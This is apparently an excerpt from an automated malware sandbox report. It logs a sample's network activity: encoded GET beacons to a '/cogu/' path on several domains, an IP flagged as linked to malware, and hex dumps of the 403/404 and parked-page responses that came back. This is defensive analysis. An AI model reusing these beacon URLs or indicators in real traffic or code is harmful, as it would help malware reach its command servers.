Source: global traffic	HTTP traffic detected: GET /cogu/?E6=CWSu9rBRqjtTkxrJy4pABq4mxihAfalcaoFBMiLqB2EmPhnp5uCs+6CRD45lGLAfaluR&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.i8news-de.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=6yxwGmrm3Ap/M+4TPZhn44EC1HJh+94HIixwD1LsvJrE4PEEHQNTPR5lSm/JOI/dScyn&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.alexanderorlandis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 93.184.220.29 93.184.220.29
Source: Joe Sandbox View	IP Address: 93.184.220.29 93.184.220.29

Connects to many different domains

Source: unknown

Network traffic detected: DNS query count 39

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 708Date: Wed, 13 Oct 2021 13:48:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requ
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:48:21 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 13:48:32 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Oct 2021 13:48:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 13:49:11 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9602-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:49:17 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Oct 2021 13:50:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Oct 2021 13:50:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 13:50:44 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9602-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:50:50 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:50:55 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 69 67 68 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.high-clicks.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Oct 2021 13:52:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
